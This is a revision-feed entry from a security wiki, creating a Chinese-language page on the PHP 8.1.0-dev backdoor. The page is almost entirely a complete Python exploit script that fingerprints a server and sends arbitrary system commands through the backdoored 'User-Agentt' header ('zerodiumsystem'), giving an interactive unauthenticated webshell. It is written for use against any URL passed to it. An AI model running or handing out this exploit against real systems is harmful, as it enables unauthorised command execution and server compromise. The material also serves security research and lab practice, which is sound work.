https://pwnwiki.com/index.php?action=history&feed=atom&title=PHP_8.1.0-dev_%E5%BE%8C%E9%96%80%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%2Fzh-cn
PHP 8.1.0-dev 後門遠程命令執行/zh-cn - Revision history
2026-04-08T17:31:09Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=PHP_8.1.0-dev_%E5%BE%8C%E9%96%80%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C/zh-cn&diff=3847&oldid=prev
Pwnwiki: Created page with "==漏洞影响=="
2021-06-01T03:07:27Z
<p>Created page with "==漏洞影响=="</p>
<p><b>New page</b></p><div><languages /><br />
==漏洞影响==<br />
<pre><br />
PHP 8.1.0-dev<br />
</pre><br />
<br />
==POC==<br />
<pre><br />
#!/usr/bin/env python3<br />
<br />
# Exploit Title: PHP 8.1.0-dev WebShell RCE (Unauthenticated)<br />
# Date: 2021-05-31<br />
# Exploit Author: Mayank Deshmukh<br />
# Vendor Homepage: https://www.php.net/<br />
# Software Link: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor<br />
# Version: PHP 8.1.0-dev<br />
# Tested on: Kali GNU/Linux 2020.3<br />
# Author website: https://coldfusionx.github.io<br />
# Author email: coldfusionx@outlook.com<br />
# Detailed POC: https://github.com/ColdFusionX/PHP-8.1.0-dev_WebShell-RCE<br />
<br />
import argparse, textwrap<br />
import requests<br />
import sys<br />
<br />
<br />
parser = argparse.ArgumentParser(description="PHP 8.1.0-dev WebShell RCE by ColdFusionX", formatter_class=argparse.RawTextHelpFormatter, <br />
epilog=textwrap.dedent(''' <br />
Exploit Usage : <br />
./exploit.py -l http://127.0.0.1<br />
[^] WebShell=- id<br />
OR<br />
[^] WebShell=- whoami<br />
''')) <br />
<br />
parser.add_argument("-l","--url", help="PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)") <br />
args = parser.parse_args()<br />
<br />
if len(sys.argv) <= 2:<br />
print (f"Exploit Usage: ./exploit.py -h [help] -l [url]") <br />
sys.exit() <br />
<br />
# Variables<br />
Host = args.url<br />
<br />
r = requests.session()<br />
<br />
## Use this for Proxy<br />
#r.proxies.update( { 'http':'http://127.0.0.1:8080' } ) <br />
<br />
def svcheck():<br />
verify = r.get(f'{Host}')<br />
<br />
if (verify.headers['X-Powered-By'] == 'PHP/8.1.0-dev') :<br />
print("Target is running on PHP 8.1.0-dev\n")<br />
return True<br />
<br />
def exec():<br />
headerscontent = {<br />
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',<br />
'User-Agentt' : f'zerodiumsystem("{Command}");'<br />
}<br />
<br />
door = r.get(f'{Host}', headers = headerscontent, allow_redirects= False)<br />
<br />
resp = door.text.split("<!DOCTYPE html>")[0]<br />
if (resp == ""):<br />
print()<br />
print("Invalid Command")<br />
print() <br />
else:<br />
print()<br />
print(resp)<br />
<br />
<br />
if __name__ == "__main__":<br />
<br />
print ('\n[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX \n ')<br />
try: <br />
if svcheck() == True:<br />
print("*Shoot your commands below* \n")<br />
try:<br />
while True:<br />
Command = input("[^] WebShell=- ")<br />
exec()<br />
except:<br />
print("\r\nExiting.")<br />
sys.exit(-1)<br />
<br />
except Exception as ex:<br />
print('Invalid URL or Target not Vulnerable')<br />
</pre></div>
Pwnwiki